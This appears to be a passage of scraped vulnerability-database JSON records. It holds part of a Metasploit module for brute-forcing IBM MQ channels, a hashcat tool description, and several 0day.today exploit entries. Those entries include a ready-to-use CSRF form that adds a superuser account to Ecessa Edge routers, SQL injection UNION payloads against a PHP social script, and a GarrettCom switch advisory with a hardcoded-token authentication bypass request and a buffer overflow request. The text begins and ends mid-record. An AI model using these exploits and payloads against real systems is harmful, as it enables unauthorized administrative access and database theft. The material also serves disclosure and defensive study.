ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}], "kitploit": [{"lastseen": "2018-10-26T03:31:44", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-uTZhOMZqPSI/W20S1FfxTzI/AAAAAAAAMHI/tTFVZ3FLYK0-qmEQR270oIXyqyx-5s-ZgCLcBGAs/s1600/hashcat.png>)\n\n \n\n\n** hashcat ** is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking. \n\n \n\n\n** Installation **\n\nDownload the [ latest release ](<https://hashcat.net/hashcat/>) and unpack it in the desired location. Please remember to use ` 7z x ` when unpacking the archive from the command line to ensure full file paths remain intact. \n\n \n\n\nGPU Driver requirements: \n\n * AMD GPUs on Windows require \"AMD Radeon Software Crimson Edition\" (15.12 or later) \n * AMD GPUs on Linux require \"AMDGPU-PRO Driver\" (16.40 or later) \n * Intel CPUs require \"OpenCL Runtime for Intel Core and Intel Xeon Processors\" (16.1.1 or later) \n * Intel GPUs on Windows require \"OpenCL Driver for Intel Iris and Intel HD Graphics\" \n * Intel GPUs on Linux require \"OpenCL 2.0 GPU Driver Package for Linux\" (2.0 or later) \n * NVIDIA GPUs require \"NVIDIA Driver\" (367.x or later) \n\n \n\n\n## Features \n\n * World's fastest password cracker \n * World's first and only in-kernel rule engine \n * ** Free **\n * ** Open-Source (MIT License) **\n * Multi-OS (Linux, Windows and OSX) \n * Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime) \n * Multi-Hash (Cracking multiple hashes at the same time) \n * Multi-Devices (Utilizing multiple devices in same system) \n * Multi-Device-Types (Utilizing mixed device types in same system) \n * Supports distributed cracking ** networks ** (using overlay) \n * Supports ** interactive ** pause / resume \n * Supports sessions \n * Supports restore \n * Supports reading password candidates from file and stdin \n * Supports hex-salt and hex-charset \n * Supports automatic ** performance ** tuning \n * Supports automatic keyspace ordering markov-chains \n * Built-in benchmarking system \n * Integrated thermal ** watchdog **\n * ** [ 200+ Hash-types ](<https://hashcat.net/hashcat/#features-algos>) ** implemented with performance in mind \n * ... ** and much more **\n\n** \n**\n\n## Algorithms \n\n * MD4 \n * MD5 \n * Half MD5 (left, mid, right) \n * SHA1 \n * SHA-224 \n * SHA-256 \n * SHA-384 \n * SHA-512 \n * SHA-3 (Keccak) \n * BLAKE2b-512 \n * SipHash \n * Skip32 \n * RIPEMD-160 \n * Whirlpool \n * DES (PT = $salt, key = $pass) \n * 3DES (PT = $salt, key = $pass) \n * ChaCha20 \n * GOST R 34.11-94 \n * GOST R 34.11-2012 (Streebog) 256-bit \n * GOST R 34.11-2012 (Streebog) 512-bit \n * md5($pass.$salt) \n * md5($salt.$pass) \n * md5(unicode($pass).$salt) \n * md5($salt.unicode($pass)) \n * md5($salt.$pass.$salt) \n * md5($salt.md5($pass)) \n * md5($salt.md5($salt.$pass)) \n * md5($salt.md5($pass.$salt)) \n * md5(md5($pass)) \n * md5(md5($pass).md5($salt)) \n * md5(strtoupper(md5($pass))) \n * md5(sha1($pass)) \n * sha1($pass.$salt) \n * sha1($salt.$pass) \n * sha1(unicode($pass).$salt) \n * sha1($salt.unicode($pass)) \n * sha1(sha1($pass)) \n * sha1($salt.sha1($pass)) \n * sha1(md5($pass)) \n * sha1($salt.$pass.$salt) \n * sha1(CX) \n * sha256($pass.$salt) \n * sha256($salt.$pass) \n * sha256(unicode($pass).$salt) \n * sha256($salt.unicode($pass)) \n * sha512($pass.$salt) \n * sha512($salt.$pass) \n * sha512(unicode($pass).$salt) \n * sha512($salt.unicode($pass)) \n * HMAC-MD5 (key = $pass) \n * HMAC-MD5 (key = $salt) \n * HMAC-SHA1 (key = $pass) \n * HMAC-SHA1 (key = $salt) \n * HMAC-SHA256 (key = $pass) \n * HMAC-SHA256 (key = $salt) \n * HMAC-SHA512 (key = $pass) \n * HMAC-SHA512 (key = $salt) \n * PBKDF2-HMAC-MD5 \n * PBKDF2-HMAC-SHA1 \n * PBKDF2-HMAC-SHA256 \n * PBKDF2-HMAC-SHA512 \n * MyBB \n * phpBB3 \n * SMF (Simple Machines Forum) \n * vBulletin \n * IPB (Invision Power Board) \n * WBB (Woltlab Burning Board) \n * osCommerce \n * xt:Commerce \n * PrestaShop \n * MediaWiki B type \n * WordPress \n * Drupal 7 \n * Joomla \n * PHPS \n * Django (SHA-1) \n * Django (PBKDF2-SHA256) \n * Episerver \n * ColdFusion 10+ \n * Apache MD5-APR \n * MySQL \n * PostgreSQL \n * MSSQL \n * Oracle H: Type (Oracle 7+) \n * Oracle S: Type (Oracle 11+) \n * Oracle T: Type (Oracle 12+) \n * Sybase \n * hMailServer \n * DNSSEC (NSEC3) \n * IKE-PSK \n * IPMI2 RAKP \n * iSCSI CHAP \n * CRAM-MD5 \n * MySQL CRAM (SHA1) \n * PostgreSQL CRAM (MD5) \n * SIP digest authentication (MD5) \n * WPA/WPA2 \n * WPA/WPA2 PMK \n * NetNTLMv1 \n * NetNTLMv1+ESS \n * NetNTLMv2 \n * Kerberos 5 AS-REQ Pre-Auth etype 23 \n * Kerberos 5 TGS-REP etype 23 \n * Netscape LDAP SHA/SSHA \n * FileZilla Server \n * LM \n * NTLM \n * Domain Cached Credentials (DCC), MS Cache \n * Domain Cached Credentials 2 (DCC2), MS Cache 2 \n * DPAPI masterkey file v1 and v2 \n * MS-AzureSync PBKDF2-HMAC-SHA256 \n * descrypt \n * bsdicrypt \n * md5crypt \n * sha256crypt \n * sha512crypt \n * bcrypt \n * scrypt \n * macOS v10.4 \n * macOS v10.5 \n * macOS v10.6 \n * macOS v10.7 \n * macOS v10.8 \n * macOS v10.9 \n * macOS v10.10 \n * iTunes backup < 10.0 \n * iTunes backup >= 10.0 \n * AIX {smd5} \n * AIX {ssha1} \n * AIX {ssha256} \n * AIX {ssha512} \n * Cisco-ASA MD5 \n * Cisco-PIX MD5 \n * Cisco-IOS $1$ (MD5) \n * Cisco-IOS type 4 (SHA256) \n * Cisco $8$ (PBKDF2-SHA256) \n * Cisco $9$ (scrypt) \n * Juniper IVE \n * Juniper NetScreen/SSG (ScreenOS) \n * Juniper/NetBSD sha1crypt \n * Fortigate (FortiOS) \n * Samsung Android Password/PIN \n * Windows Phone 8+ PIN/password \n * GRUB 2 \n * CRC32 \n * RACF \n * Radmin2 \n * Redmine \n * PunBB \n * OpenCart \n * Atlassian (PBKDF2-HMAC-SHA1) \n * Citrix NetScaler \n * SAP CODVN B (BCODE) \n * SAP CODVN F/G (PASSCODE) \n * SAP CODVN H (PWDSALTEDHASH) iSSHA-1 \n * PeopleSoft \n * PeopleSoft PS_TOKEN \n * Skype \n * WinZip \n * 7-Zip \n * RAR3-hp \n * RAR5 \n * AxCrypt \n * AxCrypt in-memory SHA1 \n * PDF 1.1 - 1.3 (Acrobat 2 - 4) \n * PDF 1.4 - 1.6 (Acrobat 5 - 8) \n * PDF 1.7 Level 3 (Acrobat 9) \n * PDF 1.7 Level 8 (Acrobat 10 - 11) \n * MS Office <= 2003 MD5 \n * MS Office <= 2003 SHA1 \n * MS Office 2007 \n * MS Office 2010 \n * MS Office 2013 \n * Lotus Notes/Domino 5 \n * Lotus Notes/Domino 6 \n * Lotus Notes/Domino 8 \n * Bitcoin/Litecoin wallet.dat \n * Blockchain, My Wallet \n * Blockchain, My Wallet, V2 \n * 1Password, agilekeychain \n * 1Password, cloudkeychain \n * LastPass \n * Password Safe v2 \n * Password Safe v3 \n * KeePass 1 (AES/Twofish) and KeePass 2 (AES) \n * JKS Java Key Store Private Keys (SHA1) \n * Ethereum Wallet, PBKDF2-HMAC-SHA256 \n * Ethereum Wallet, SCRYPT \n * eCryptfs \n * Android FDE <= 4.3 \n * Android FDE (Samsung DEK) \n * TrueCrypt \n * VeraCrypt \n * LUKS \n * Plaintext \n\n \n\n\n## Attack-Modes \n\n * Straight * \n * Combination \n * Brute-force \n * Hybrid dict + mask \n * Hybrid mask + dict \n* accept Rules \n \n\n\n## Supported OpenCL runtimes \n\n * AMD \n * Apple \n * Intel \n * Mesa (Gallium) \n * NVidia \n * pocl \n\n \n\n\n## Supported OpenCL device types \n\n * GPU \n * CPU \n * APU \n * DSP \n * FPGA \n * Coprocessor \n\n** [ Download Hashcat ](<https://hashcat.net/hashcat/>) **\n", "modified": "2018-08-12T21:07:12", "published": "2018-08-12T21:07:12", "id": "KITPLOIT:438679451792979314", "href": "http://www.kitploit.com/2018/08/hashcat-v421-worlds-fastest-and-most.html", "title": "Hashcat v4.2.1 - World's Fastest and Most Advanced Password Recovery Utility", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-06-25T11:50:08", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-06-25T00:00:00", "published": "2018-06-25T00:00:00", "id": "1337DAY-ID-30624", "href": "https://0day.today/exploit/description/30624", "title": "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser) Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)\r\n# Author: LiquidWorm\r\n# Vendor: Ecessa Corporation\r\n# Product web page: https://www.ecessa.com\r\n# Affected version: 10.7.4, 10.6.9, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24\r\n# Tested on: lighttpd/1.4.35\r\n \r\n# Summary: Internet Failover and Load Balancing for Small Businesses, Stores\r\n# and Branch Offices.\r\n \r\n# Desc: The application interface allows users to perform certain actions via\r\n# HTTP requests without performing any validity checks to verify the requests.\r\n# This can be exploited to perform certain actions with administrative privileges\r\n# if a logged-in user visits a malicious web site.\r\n \r\n<html>\r\n <body>\r\n <form action=\"https://Target/cgi-bin/pl_web.cgi/util_configlogin_act\" method=\"POST\">\r\n <input type=\"hidden\" name=\"savecrtcfg\" value=\"checked\" />\r\n <input type=\"hidden\" name=\"user_username1\" value=\"root\" />\r\n <input type=\"hidden\" name=\"user_enabled1\" value=\"on\" />\r\n <input type=\"hidden\" name=\"user_passwd1\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_passwd_verify1\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_delete1\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_username2\" value=\"admin\" />\r\n <input type=\"hidden\" name=\"user_passwd2\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_passwd_verify2\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_delete2\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_username3\" value=\"user\" />\r\n <input type=\"hidden\" name=\"user_enabled3\" value=\"on\" />\r\n <input type=\"hidden\" name=\"user_passwd3\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_passwd_verify3\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_delete3\" value=\"\" />\r\n <input type=\"hidden\" name=\"user_username4\" value=\"h4x0r\" />\r\n <input type=\"hidden\" name=\"user_enabled4\" value=\"on\" />\r\n <input type=\"hidden\" name=\"user_superuser4\" value=\"on\" />\r\n <input type=\"hidden\" name=\"user_passwd4\" value=\"123123\" />\r\n <input type=\"hidden\" name=\"user_passwd_verify4\" value=\"123123\" />\r\n <input type=\"hidden\" name=\"users_num\" value=\"4\" />\r\n <input type=\"hidden\" name=\"page\" value=\"util_configlogin\" />\r\n <input type=\"hidden\" name=\"val_requested_page\" value=\"user_accounts\" />\r\n <input type=\"hidden\" name=\"savecrtcfg\" value=\"checked\" />\r\n <input type=\"hidden\" name=\"page_uuid\" value=\"3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d\" />\r\n <input type=\"hidden\" name=\"form_has_changed\" value=\"1\" />\r\n <input type=\"submit\" value=\"Supersize!\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-06-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30624"}, {"lastseen": "2018-03-10T04:11:39", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "href": "https://0day.today/exploit/description/29173", "id": "1337DAY-ID-29173", "type": "zdt", "title": "Facebook Clone Script 1.0 - id / send SQL Injection Vulnerability", "sourceData": "# # # # # \r\n# Exploit Title: Facebook Clone Script 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 08.12.2017\r\n# Vendor Homepage: https://www.phpscriptsmall.com/\r\n# Software Link: https://www.phpscriptsmall.com/product/facebook-clone/\r\n# Demo: http://smsemailmarketing.in/demo/fbclone/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an users to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/friend-profile.php?id=[SQL\r\n# \r\n# -1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+-\r\n# \r\n# http://server/friend-profile.php?id=-1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+-\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/process.php?send=[SQL\r\n# \r\n# # # # #\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/29173", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-03T19:16:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-05-20T00:00:00", "published": "2017-05-20T00:00:00", "href": "https://0day.today/exploit/description/27805", "id": "1337DAY-ID-27805", "type": "zdt", "title": "Belden Garrettcom 6K/10K Switches - Authentication Bypass / Memory Corruption Vulnerabilities", "sourceData": "Introduction\r\n------------\r\n \r\nVulnerabilities were identified in the Belden GarrettCom 6K and 10KT\r\n(Magnum) series network switches. These were discovered during a black box \r\nassessment and therefore the vulnerability list should not be considered \r\nexhaustive; observations suggest that it is likely that further vulnerabilities \r\nexist. It is strongly recommended that GarrettCom undertake a full whitebox\r\nsecurity assessment of these switches.\r\n \r\nThe version under test was indicated as: 4.6.0. Belden Garrettcom released\r\nan advisory on 8 May 2017, indicating that issues were fixed in 4.7.7:\r\nhttp://www.belden.com/docs/upload/Belden-GarrettCom-MNS-6K-10K-Security-Bulletin-BSECV-2017-8.pdf\r\n \r\nGarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token\r\n----------------------------------------------------------------------------\r\n \r\nSeverity: **High**\r\n \r\nThe string \"GoodKey\" can be used in place of a session token for the web\r\ninterface, allowing a complete bypass to all web interface authentication.\r\nThe following request/response demonstrates adding a user \u2018gibson\u2019 with the\r\npassword \u2018god\u2019 on any GarrettCom 6K or 10K switch.\r\n \r\n GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey\r\nHTTP/1.1\r\n Host: 192.168.0.2\r\n Connection: close\r\n User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\r\nlike Gecko) Chrome/56.0.2924.28 Safari/537.36\r\n Accept: */*\r\n Referer: https://192.168.0.2/gc/flash.php\r\n Accept-Encoding: gzip, deflate, sdch, br\r\n Accept-Language: en-US,en;q=0.8\r\n \r\n \r\n HTTP/1.0 200 OK\r\n Server: GoAhead-Webs\r\n Content-Type: text/html\r\n \r\n <?xml version='1.0' encoding='UTF-8'?><data val=\"users\"><changed\r\nval=\"yes\" />\r\n <helpfile val=\"user_accounts.html\" />\r\n <user uid=\"operator\" access=\"Operator\" />\r\n <user uid=\"manager\" access=\"Manager\" />\r\n <user uid=\"gibson\" access=\"Manager\" />\r\n </data>\r\n \r\nGarrettCom-02 - Secrets Accessible to All Users\r\n-----------------------------------------------\r\n \r\nSeverity: **High**\r\n \r\nUnprivileged but authenticated users (\"operator\" level access) can view the\r\nplaintext passwords of all users configured on the system, allowing them to\r\nescalate privileges to \"manager\" level. While the default \"show config\"\r\nmasks the passwords, executing \"show config saved\" includes the plaintext\r\npasswords. The value of the \"secrets\" setting does not affect this.\r\n \r\n 6K>show config group=user saved\r\n ...\r\n #User Management#\r\n user\r\n add user=gibson level=2 pass=god\r\n Exit\r\n ...\r\n \r\nGarrettCom-03 - Stack Based Buffer Overflow in HTTP Server\r\n----------------------------------------------------------\r\n \r\nSeverity: **High**\r\n \r\nWhen rendering the /gc/flash.php page, the server performs URI encoding of\r\nthe Host header into a fixed-length buffer on the stack. This decoding appears\r\nunbounded and can lead to memory corruption, possibly including remote code\r\nexecution. Sending garbage data appears to hang the webserver thread after\r\nresponding to the present request. Requests with Host headers longer than\r\n220 characters trigger the observed behavior.\r\n \r\n GET /gc/flash.php HTTP/1.1\r\n Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n Connection: close\r\n Cache-Control: max-age=0\r\n Upgrade-Insecure-Requests: 1\r\n User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\r\nlike Gecko) Chrome/56.0.2924.28 Safari/537.36\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\r\nimage/webp,*/*;q=0.8\r\n Accept-Encoding: gzip, deflate, sdch, br\r\n Accept-Language: en-US,en;q=0.8\r\n \r\nGarrettCom-04 - SSL Keys Shared Across Devices\r\n----------------------------------------------\r\n \r\nSeverity: **Moderate**\r\n \r\nThe SSL certificate on all devices running firmware version 4.6.0 is the\r\nsame. This issue was previously reported and an advisory released by\r\nICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web\r\nserver certificate remains static in 4.6.0:\r\n \r\n openssl s_client -connect 192.168.0.5:443 -showcerts\r\n CONNECTED(00000003)\r\n depth=0 C = US, ST = California, L = Fremont, O = Belden, OU =\r\nTechnical Support, CN = 192.168.1.2, emailAddress = [email\u00a0protected]\r\n verify error:num=18:self signed certificate\r\n verify return:1\r\n depth=0 C = US, ST = California, L = Fremont, O = Belden, OU =\r\nTechnical Support, CN = 192.168.1.2, emailAddress = [email\u00a0protected]\r\n verify return:1\r\n ---\r\n Certificate chain\r\n 0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=\r\n192.168.1.2/[email\u00a0protected]\r\n i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=\r\n192.168.1.2/[email\u00a0protected]\r\n -----BEGIN CERTIFICATE-----\r\n MIIEtTCCA52gAwIBAgIBADANBgkqhkiG9w0BAQUFADCBnTELMAkGA1UEBhMCVVMx\r\n EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT\r\n BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5\r\n Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w\r\n HhcNMTUxMDI3MTEyNzQ2WhcNMjUxMDI0MTEyNzQ2WjCBnTELMAkGA1UEBhMCVVMx\r\n EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT\r\n BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5\r\n Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w\r\n ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDFlt+j4OvpcgfdrFGnBxti\r\n ds6r9sNEcR9JdAFbOmwybQkdqIw9Z9+teU/rixPocEE4gL8beNuw/D3lDc4RJ63m\r\n 1zuQ1riFOkTsz7koKQNWTh3CkIBE7843p5I/GVvhfR7xNCCmCWPdq+6/b3nhott5\r\n oBeMLOjIWnjFgyVMsWR22JOYv+euWwr4oqZDLfBHjfipnu36J1E2kHLG3TL9uwyN\r\n DUxtrIbvfi5tOxi8tx1bxZFQU1jxoQa725gO+1TOYzfSoY1a7/M0rMhJM1wFXak6\r\n jbDbJLSv2TXMWrSJlGFUbCcKv3kE22zLcU/wx1Xl4a4NNvFW7Sf5OG2B+bFLr4fD\r\n AgMBAAGjgf0wgfowHQYDVR0OBBYEFLtGmDWgd773vSkKikDFSz8VOZ7DMIHKBgNV\r\n HSMEgcIwgb+AFLtGmDWgd773vSkKikDFSz8VOZ7DoYGjpIGgMIGdMQswCQYDVQQG\r\n EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEQMA4GA1UEBxMHRnJlbW9udDEPMA0G\r\n A1UEChMGQmVsZGVuMRowGAYDVQQLExFUZWNobmljYWwgU3VwcG9ydDEUMBIGA1UE\r\n AxMLMTkyLjE2OC4xLjIxJDAiBgkqhkiG9w0BCQEWFWdjaXN1cHBvcnRAYmVsZGVu\r\n LmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQBAiuv06CMD\r\n ij+9bEZAfmHftptG4UqsNgYIFZ1sN7HC6RBR9xy45fWVcQN3l3KiyddLsftbZSOa\r\n CRPpzqgpF58hGwAa7+yQPOjOWf+uLc9Oyex6P9ewAo6c5iiYI865FSQ+QCY4xbD1\r\n Uk/WFV2LKOzxkXPRcVB4KR81g8tSZF3E8llybhEngg7cvN3uHpO5a5U085xuBbcF\r\n To9PSbGKyJ7UGESBTD6KxLWAxoD6VGRV2CAZa/F9RTbdG1ZbTUMvoEDmYqv7Pjv/\r\n ApZzztLJlCyhVM4N/jh/Q/g1VaQWuzPpza6utjN5soUxeZYJB6KwzGUiLnyTNBJz\r\n L4JtsUO8AcWb\r\n -----END CERTIFICATE-----\r\n \r\nNote that Belden Garrettcom has addressed this issue by reinforcing that\r\nusers of the switches should install their own SSL certificates if they\r\ndo not want to use the default certificate and key.\r\n \r\nGarrettCom-05 - Weak SSL Ciphers Enabled\r\n----------------------------------------\r\n \r\nSeverity: **Moderate**\r\n \r\nMany of the SSL ciphers available for the switch are outdated or use\r\ninsecure ciphers or hashes. Additionally, no key exchanges with perfect forward\r\nsecrecy are offered, rendering all previous communications possibly compromised,\r\ngiven the issue reported above. Particularly of note is the use of 56-bit DES,\r\nRC4, and MD5-based MACs.\r\n \r\n ssl3: AES256-SHA\r\n ssl3: CAMELLIA256-SHA\r\n ssl3: DES-CBC3-SHA\r\n ssl3: AES128-SHA\r\n ssl3: SEED-SHA\r\n ssl3: CAMELLIA128-SHA\r\n ssl3: RC4-SHA\r\n ssl3: RC4-MD5\r\n ssl3: DES-CBC-SHA\r\n tls1: AES256-SHA\r\n tls1: CAMELLIA256-SHA\r\n tls1: DES-CBC3-SHA\r\n tls1: AES128-SHA\r\n tls1: SEED-SHA\r\n tls1: CAMELLIA128-SHA\r\n tls1: RC4-SHA\r\n tls1: RC4-MD5\r\n tls1: DES-CBC-SHA\r\n tls1_1: AES256-SHA\r\n tls1_1: CAMELLIA256-SHA\r\n tls1_1: DES-CBC3-SHA\r\n tls1_1: AES128-SHA\r\n tls1_1: SEED-SHA\r\n tls1_1: CAMELLIA128-SHA\r\n tls1_1: RC4-SHA\r\n tls1_1: RC4-MD5\r\n tls1_1: DES-CBC-SHA\r\n tls1_2: AES256-GCM-SHA384\r\n tls1_2: AES256-SHA256\r\n tls1_2: AES256-SHA\r\n tls1_2: CAMELLIA256-SHA\r\n tls1_2: DES-CBC3-SHA\r\n tls1_2: AES128-GCM-SHA256\r\n tls1_2: AES128-SHA256\r\n tls1_2: AES128-SHA\r\n tls1_2: SEED-SHA\r\n tls1_2: CAMELLIA128-SHA\r\n tls1_2: RC4-SHA\r\n tls1_2: RC4-MD5\r\n tls1_2: DES-CBC-SHA\r\n \r\nGarrettCom-06 - Weak HTTP session key generation\r\n------------------------------------------------\r\n \r\nSeverity: **Moderate**\r\n \r\nThe HTTP session key generation is predictable due to the lack of\r\nrandomness in the generation process. The key is generated by hashing the \r\nprevious hash result with the current time unit with precision around 50 unit \r\nper second. The previous hash is replaced with a fixed salt for the first hash \r\ngeneration.\r\n \r\nThe vulnerability allows an attacker to predict the first key that\u2019s\r\ngenerated by the switch if he has some knowledge about when the key was generated.\r\nAlternatively, the vulnerability also enables privilege escalation attacks\r\nwhich predict all future keys by observing two consecutive key generations of\r\nlower privileges.\r\n \r\nTimeline\r\n--------\r\n \r\n2017/01/?? - Issues Discovered\r\n2017/01/27 - Reported to [email\u00a0protected]\r\n2017/04/27 - 90 day timeline expires, Belden reports patched release forthcoming.\r\n2017/05/08 - Belden releases update & advisory.\r\n2017/05/15 - Disclosure published\r\n \r\nDiscovery\r\n---------\r\n \r\nThese issues were discovered by Andrew Griffiths, David Tomaschik, and\r\nXiaoran Wang of the Google Security Assessments Team.\n\n# 0day.today [2018-01-03] #", "sourceHref": "https://0day.today/exploit/27805", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-31T15:39:33", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-07-20T00:00:00", "published": "2016-07-20T00:00:00", "id": "1337DAY-ID-25181", "href": "https://0day.today/exploit/description/25181", "type": "zdt", "title": "WordPress Video Player 1.5.16 Plugin - SQL Injection", "sourceData": "<!--\r\nMultiple SQL injection vulnerabilities in WordPress Video Player\r\n \r\nAbstract\r\n \r\nIt was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.\r\n \r\nContact\r\n \r\nFor feedback or questions about this advisory mail us at sumofpwn at securify.nl\r\n \r\nThe Summer of Pwnage\r\n \r\nThis issue has been found during the Summer of Pwnage hacker event, running from July 